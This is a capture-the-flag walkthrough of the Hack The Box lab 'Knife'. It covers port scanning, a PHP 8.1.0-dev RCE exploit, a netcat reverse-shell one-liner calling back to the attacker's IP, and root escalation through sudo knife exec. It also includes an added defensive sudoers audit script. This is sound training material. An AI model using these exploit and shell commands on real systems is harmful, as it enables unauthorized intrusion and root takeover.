Today we are going to solve the Hack The Box lab named Knife. The purpose is to accept the challenge to root the machine, using remote code execution and sudo rights to pwn the victim's machine.
Level: Easy
Table of Contents
Network Scanning
  - Nmap
Enumeration
  - Nikto
Exploitation
  - RCE (Python)
  - User.txt
Privilege Escalation
  - Sudo Rights
  - Root.txt
Attacker machine: Kali
Victim's machine: HTB
Network Scanning
Run Nmap to find the open ports and services.
nmap -A 10.129.223.91
As per the Nmap result, two ports are open: port 80 (HTTP) and port 22 (SSH). So our only avenues of attack are port 80 and port 22.
At first look, we navigate to port 80 in the web browser, but we find nothing informative here.
http://10.129.223.91
Enumeration
Without losing hope, we move forward with the web scanner tool Nikto to find vulnerabilities, if any. Run the command below; the output reveals the X-Powered-By header as PHP/8.1.0-dev.
nikto -h 10.129.223.91
Let's Google for a PHP 8.1.0-dev exploit.
We find that this PHP version is vulnerable and allows remote code execution: if this version runs on a server, an attacker can execute arbitrary code by sending a crafted User-Agent header.
On Exploit-DB we find exploit EDB-ID 49933; download the script from the link below and save it.
URL: https://www.exploit-db.com/exploits/49933
Exploitation
Execute the downloaded script on Kali and enter the full host URL of the victim's machine (the HTB machine). Simultaneously, run a netcat listener on port 1234 in the next terminal.
nc -lvp 1234
python3 49933.py http://10.129.223.91
In the above screenshot, we are getting garbage output in the shell. Let's get a reliable shell by running the following one-liner in the unreliable shell (the listener on 10.10.14.100:1234 is our Kali netcat):
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.100 1234 >/tmp/f
Wow!! On the netcat terminal we have a session, and now the enumeration journey starts and we get user.txt.
But our hunger is for root.txt. Let's proceed to the root flag.
I notice something interesting with sudo rights.
sudo -l
Privilege Escalation
As shown in the above screenshot, user james may run /usr/bin/knife as root because he has sudo privileges with no password.
Let's see what GTFOBins says about knife:
Knife: This is capable of running Ruby code. If the binary is allowed to run as a superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
Refer: https://gtfobins.github.io/gtfobins/knife/#sudo
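From the defender's side, the rule that made this box fall is a NOPASSWD sudo entry for a binary that can run arbitrary code. Below is an added example (not part of the original writeup) that parses sudoers-style rules and flags such entries; the sample sudoers text and the list of code-executing binaries are constructed for the demo, modelled on the james -> /usr/bin/knife rule shown by sudo -l.

```python
import re

# Binaries GTFOBins documents as able to run arbitrary code when allowed via sudo
# (knife executes Ruby via `knife exec`). Constructed, partial sample list for the audit.
CODE_EXEC_BINARIES = {"/usr/bin/knife", "/usr/bin/ruby", "/usr/bin/python3",
                      "/usr/bin/perl", "/usr/bin/vim", "/usr/bin/find"}

# Constructed sudoers text modelled on the `sudo -l` output on the box (james -> knife).
SAMPLE_SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
james   ALL=(root) NOPASSWD: /usr/bin/knife
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
%sudo   ALL=(ALL:ALL) ALL
"""

RULE_RE = re.compile(r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*(?P<rest>.+)$")
TAG_RE = re.compile(r"^(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):\s*")

def parse_sudoers(text):
    """Return one dict per user specification line; comments and Defaults are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags, rest = set(), m.group("rest")
        while (t := TAG_RE.match(rest)):          # peel off leading tags such as NOPASSWD:
            tags.add(t.group(1))
            rest = rest[t.end():]
        cmds = [c.strip() for c in rest.split(",") if c.strip()]
        rules.append({"user": m.group("user"), "runas": m.group("runas"),
                      "tags": tags, "cmds": cmds})
    return rules

def audit_sudoers(text):
    """Flag NOPASSWD rules that let a user run a code-executing binary as root."""
    findings = []
    for rule in parse_sudoers(text):
        runas_user = rule["runas"].split(":")[0]      # "(root)" or "(ALL:ALL)" -> root-capable
        if runas_user not in ("root", "ALL") or "NOPASSWD" not in rule["tags"]:
            continue
        for cmd in rule["cmds"]:
            binary = cmd.split()[0]
            if binary in CODE_EXEC_BINARIES:
                findings.append((rule["user"], binary))
    return findings

if __name__ == "__main__":
    for user, binary in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user} may run {binary} as root without a password: code execution as root")
```

Running it against the real file (sudo visudo -c -f /etc/sudoers to validate first, then feed the contents) surfaces the same class of rule before an attacker does.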
Below are the commands to run:
sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
cd /root
ls
cat root.txt
Finally, we capture the flag.